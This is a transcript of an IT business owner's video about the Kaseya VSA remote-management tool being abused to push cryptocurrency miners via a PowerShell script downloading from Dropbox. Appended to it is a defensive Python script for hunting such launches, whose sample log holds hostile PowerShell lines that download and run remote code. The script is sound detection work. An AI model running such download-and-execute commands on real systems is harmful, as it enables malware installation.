So if you've seen the last episode of Vlog Thursday, you know I started out being a little bit upset, and this is what I wanted to rant about. So now that I'm done recording the vlog, I'm recording this real quick, so this is hopefully the next video. Anyway, let's jump into this here: the Kaseya IT RMM software for MSPs. I'll give you a quick overview if you're not familiar with this. What an MSP is is a managed service provider, and it's something we do with our clients. So we are an MSP, which means we manage and are the outside IT for a company. They pay us a fee, and we then actively monitor their IT. Now that means we need tools, and of those tools there are a few choices out there. Full disclosure: right now in 2018, and for the last several years, we have been a SolarWinds customer; we have used a SolarWinds product. So I'm not bashing on this company specifically; I'm calling out some security vulnerabilities. It's not that I don't like them because I don't use them or anything like that. I want people to really think about this and really take time, because too much (and this is the part that makes me mad) of the IT people I meet are driven by price. They're like, "Tom, I can't make enough money at that, I can't make enough money at this." They look at software going, "Well, the margin's not good enough." I'm like, when I'm deciding on software, I start with security, utmost, always first and foremost. Is this a secure product I'm using? Great. I do care if I make a few dollars, because we all have to stay in business. I'm a business owner; it's important, you've got to make money, I think, so that is a concern. So it's security, it's features, and price; those are factors. Security, though, is not a factor, it's an imperative. If it's not secure, I'm not using it. If it's maybe secure, I'm not using it.
That is a huge thing to me. Now, this is also really, really hard to figure out, whether or not something is secure, but we're gonna talk about the flaw that happened here, because this is very scary to me, and I don't know why it's not bigger news. If I'm in the IT service business, this should be huge news, because it's a popular piece of software. So this is their Kaseya VSA next-gen remote monitoring and management software, and this is similar to what we do with SolarWinds; it's a competing product here. You get these cool dashboards, and they show me whether or not you've got your patches loaded and everything else. This is also how you scale up your company: we use automation software so we manage, you know, hundreds of computers and clients and all this stuff from dashboards that let us see everything en masse. But that comes with a little bit of a risk. Obviously, if this tool has remote patch management, remote control, network performance, antivirus, anti-malware and cloud backup, and those integration levels are at the server and desktop, that means this program, whatever program you choose for your IT automation, has a lot of power over those servers. So this is why security is important; you want the company to be very, very secure. That being said, let's talk about what actually happened here, and then some of my aggravations with this. So the few people who broke the news here, and I'll of course, as always, leave all the links below: Kaseya Virtual System Administrator has been compromised. Now, this is what's going on; this is the way it was found, and let's break it down. This is from a security operations center, eSentire. What these folks are is managed detection: "Hackers never take a break, neither do we." You know, I'm not super familiar with the company, but what they are is what you'd call a SOC, which is a security operations center, and they look for anomalies in some of the outgoing traffic and manage your firewalls.
That's an important thing. That being said, watching IPs in your computers from a network connecting to weird IPs is a reactionary process, by the way. And this is what they found: there was a PowerShell script, and this was launched via the Kaseya system. It then downloaded... now, this is where things get a little bit tricky. You have different protections that block websites from coming in, like a UTM, or universal threat management, which is your firewall system. I'm sorry, unified threat management. Anyway, the concept is the firewall does blocking of sites, once again a reactive process, so you hope the sites are blocked. And now, how did this get through? Not real clear. I would love if they gave a clearer debrief, which I'm gonna get to in a second. But the short of it is, the reason the script was able to get through is it's simply a PowerShell script, and the PowerShell script was downloading from Dropbox. We know that from Huntress Labs over here: "PowerShell payload for Kaseya VSA Monero malware changes registry keys and added their new storage" release, blah blah blah. In short, though, and they break it down in here, I think at the bottom, it was downloaded from a Dropbox account. So because Dropbox isn't on the blacklist, it automatically had no problem downloading, because, well, you don't blacklist Dropbox, because most businesses use it or have to have access to it. So this is how it got through, and so all that fun blocking stuff that UTMs do did nothing, because you can't block Dropbox or you'd have a different business problem. Here's the payloads it downloaded. The real question is, how did this happen at Kaseya? How did this tool that was used to control all these systems get compromised? And now they have a patch for this. This is tragic, this is terrible, this would be a big disaster. This is what worries me about so many of these programs: how good is the security?
We have to blindly trust some of them. They're not open source, or not giving us any look at how they actually manage things inside their company, but you can develop ideas and patterns from companies, and the reason I say that now... it's funny, because please note, this is a cached Google page of this; I'll leave this link in here as well. "Action required: Kaseya VSA product vulnerability, Litecoin mining malware." And you're probably thinking, wait a minute, Tom, you just showed me Monero mining. Yeah, yeah, this is a year ago, one year ago, same problem. And the reason we're gonna use the cached one: they deleted this off their website, and I don't know why, but once you've put it on the internet, it's on the internet. Thank you, Google web cache, and things like the Wayback Machine. So, and I love, look at the phrasing here: "While the malware may have allowed an unknown attacker to access endpoint systems that may contain sensitive data elements, we have seen nothing to suggest this malware was harvesting personal, financial or any other kind of sensitive information, or any individual's information has been misused as a result of the attack." And of course, this is the actual page link: not found. They deleted it, I guess because it looks bad when you use the same phrasing in here in January of 2018: "We have seen no evidence to suggest that this vulnerability was used to harvest personal, financial or other sensitive information. However, we are aware of a small subset of our partners where Monero cryptocurrency mining software is deployed to the endpoints." The fact that they were able to deploy this, that raises massive alarms. Not because it happened once; security is really, really hard, because with security you have to be right every day, 24/7, all the time, with the hackers; they only gotta be right once. They just keep plugging away, and when people find the hole, they get in. But the fact that this company, two times, two different cryptocurrencies being mined, compromising customers, that is a massive, for a
company that specifically is for patching and securing systems, that is a massive breach of trust between the clients. So that's huge to me, and it makes me worry constantly, because I see so many people that love these outsourced automation tools, that are things like, for all your documentation, we'll just put it all in the cloud and we'll keep it secure, and it has full access to every one of your clients and everything in there. And this is why I try as much as I can to have solutions that are transparent, and I don't mind paying extra money, because the security thing is huge. And I'm not making any libel claims against them; I'm reading off their own website and their patches on here, and this is quite scary to me. I feel as though they're downplaying it, because, granted, yeah, we don't see any evidence of financial data, but someone got in there and turned your systems into crypto mining. That is a massive problem. What if they would have done something worse? What if they did other things and we don't know it, because we didn't see it, because they just didn't do anything that was suspicious? What if they downloaded from Dropbox and re-uploaded from a target, you know, a financial list or anything else? You don't see it. Well, how would you see it? We only know what we found; we don't know what we didn't find. But we know there was a hole that allowed someone to do this. We would love it, and I would love a full debrief. So if someone from Kaseya wants to reach out to me and give a debrief, that'd be awesome. I'd love them to publish it; I really want it to be public. I don't mind interviewing off video, but I'd like it to be public, because we really want to know, in order to gather trust. I mean, with security, mistakes happen. I just covered one on Grammarly today. They fixed it, they admitted to it.
They owned up to it: "We made a mistake, someone found it." And I'm hoping, and I'm trying to reach out to some of the security researchers I know, because there's so many of these different tools like this out there: SolarWinds, Kaseya, ConnectWise. But this is big. I don't know of any vulnerabilities that were discovered, found, and that this happened to in the other ones. If you have links to any, I'd be more than happy to read into it, but it's just the Kaseya one that popped up. I've seen a couple of people post about it; it doesn't seem to be getting any traction, but it still scares me, and I want more security researchers, hopefully, to raise an interest, because this is really popular in my industry. As the IT industry, we're all using some type of tool like this, and we want these tools to improve and not be creating the risk that we're trying to prevent for the clients, because that's where this really gets scary. And it bothers me a lot, though, that I cannot find anything other than the cached Google version of that page. So there's the page, if you see it right here, the dash da da da: page not found. So when you, yeah, Google's cached copy, you click on it, it just redirects and you can see "page not found." So why'd they take it down? Is it because it's embarrassing? I mean, really, if you fail, leave it up there. Disclose, you know, that it happened. We move on, we build trust, we talk about how it's not gonna happen again, we debrief on it. "Page not found" is, I don't think, acceptable. That's my opinion on that. But yeah, this is definitely concerning: twice they were hit with miners, two different miners, but still the same concept. And of course they went through all the security because they used Dropbox. So the hackers, they evolved, you know, so here's this. And the fact that this was reactionary, not proactive, is also very scary. So let me know your thoughts on this.
I'm really curious, and if you know of any of the other major RMM providers that are in this market that have had this type of thing... I didn't, I'm just not aware of any, but it appears to have happened twice now to these people. That's just, that's really scary to me. So just think about that when you're out there looking at products. If your job is protecting your clients, what's your plan B if this happens? How do you save the embarrassment? Did any of you tell and share with your clients if you found it, and all you did is remove a Bitcoin miner? Do you disclose to them? You're probably in violation if you didn't. This becomes a moral and ethical hacking question: if a client's compromised, and they're a financial service provider, should they follow their own procedures for compliance and then let people know that there's a chance that someone, because there was an unauthorized app on there... This is dealt with in hospitals all the time, even if they didn't necessarily get the client data that you can prove, but they were in the system that had all the client data.
You now have to do some disclosure; there's laws regarding this. So this is just some thought-provoking, I hope, and some real concerns I have with this, and this is what had me upset this morning. I'm like, this is crazy that it happened twice in this company, they deleted the page, and too many of these companies... and I'm not gonna call out any IT people I know, but in some of the peer groups I belong to, so many of these people seem overly focused on price. And you're doing a disservice to the community, because people trust you as an IT person, and you're like, "Well, if I switch providers I can make 10 more percent or 20 more percent." Yeah, but are you thinking about the security of that company? If they're half the price of the competitors, is it because the competitor is greedy and just charges too much for the product, or are they going, "Hey, good security guys cost a lot of money, and that was, you know, that's our payroll"? This also goes back to transparency in companies: please just disclose more to us, so we have a better understanding of what's going on. And Kaseya, please debrief us on this; we would love to know all the details. That's how you build trust back in the community. So thanks for watching. If you like the content here, like and subscribe, and let me know your thoughts on this. I'm curious.
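As an added example (not part of the video, and not code from Kaseya, eSentire or Huntress Labs), the defensive lesson of the episode, that a URL blacklist on the UTM cannot catch a PowerShell downloader that pulls its payload from Dropbox, can be turned into a hunt over endpoint process-creation telemetry instead of the firewall: flag a PowerShell launch when it is spawned by the RMM agent, uses a download primitive, hides its window, or fetches from a consumer file-sharing domain, and alert only when several of those traits line up, so routine RMM automation scripts are not flagged. The log lines below are constructed for the example, and `rmm_agent.exe` is a placeholder for whatever binary your RMM vendor's agent actually runs as.

```python
"""Hunt for suspicious PowerShell launches in process-creation logs.

Constructed example: the log lines are made up for illustration and
rmm_agent.exe is a placeholder (assumption) for the RMM vendor's agent binary.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample records (not real telemetry).
# Fields: timestamp|host|parent_image|image|command_line
SAMPLE_LOG = r"""
2018-01-10T09:12:03Z|WS-017|rmm_agent.exe|powershell.exe|powershell.exe -NoProfile -WindowStyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/CONSTRUCTED/payload.ps1?dl=1')"
2018-01-10T09:15:44Z|WS-017|explorer.exe|powershell.exe|powershell.exe -File C:\Scripts\cleanup.ps1
2018-01-10T09:20:01Z|SRV-02|rmm_agent.exe|powershell.exe|powershell.exe -c "Get-Service | Out-File C:\Temp\svc.txt"
2018-01-10T10:02:17Z|WS-021|outlook.exe|powershell.exe|powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/x.exe','C:\Users\Public\x.exe')"
""".strip()

# Placeholder: substitute the image name your RMM agent really runs as (assumption).
RMM_AGENT_IMAGES = {"rmm_agent.exe"}
# Consumer file-sharing services that URL filtering usually cannot block outright.
FILE_SHARING_DOMAINS = {"dropbox.com", "dropboxusercontent.com", "drive.google.com", "onedrive.live.com"}
# Substrings showing PowerShell is being used to fetch content from the network.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "start-bitstransfer", "net.webclient")
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


def parse_log(text: str) -> list:
    """Parse pipe-delimited records; maxsplit=4 keeps pipes inside the command line intact."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(ts, host, parent, image, cmdline))
    return events


def in_domain_set(hostname: str, domains: set) -> bool:
    """True if hostname is one of `domains` or a subdomain of one."""
    hostname = hostname.lower()
    return any(hostname == d or hostname.endswith("." + d) for d in domains)


def has_hidden_window(cmdline: str) -> bool:
    """Matches -WindowStyle Hidden and the abbreviated -w hidden form."""
    return re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.IGNORECASE) is not None


def score_event(ev: ProcEvent) -> list:
    """Return the suspicious traits seen on a PowerShell launch (empty list if none)."""
    if ev.image.lower() != "powershell.exe":
        return []
    reasons = []
    lowered = ev.cmdline.lower()
    if ev.parent.lower() in RMM_AGENT_IMAGES:
        reasons.append("spawned by RMM agent")
    if any(marker in lowered for marker in DOWNLOAD_MARKERS):
        reasons.append("download primitive in command line")
    if has_hidden_window(ev.cmdline):
        reasons.append("hidden window")
    for url in URL_RE.findall(ev.cmdline):
        host = urlparse(url).hostname or ""
        if in_domain_set(host, FILE_SHARING_DOMAINS):
            reasons.append(f"fetches from file-sharing domain {host}")
            break
    return reasons


def hunt(text: str, threshold: int = 2) -> list:
    """Return (timestamp, host, reasons) for events showing at least `threshold` traits."""
    hits = []
    for ev in parse_log(text):
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev.ts, ev.host, reasons))
    return hits


if __name__ == "__main__":
    for ts, host, reasons in hunt(SAMPLE_LOG):
        print(f"{ts} {host}: " + "; ".join(reasons))
```

With the default threshold of two traits, the first record (agent-spawned, hidden, downloading a script from Dropbox) and the fourth (hidden PowerShell pulling an executable from a raw IP) are reported, while the third, an ordinary agent-launched inventory script, is not, which is the balance an MSP needs so that the tool's own automation does not drown the alert. The point is that this correlation works regardless of whether the download host is on any blacklist.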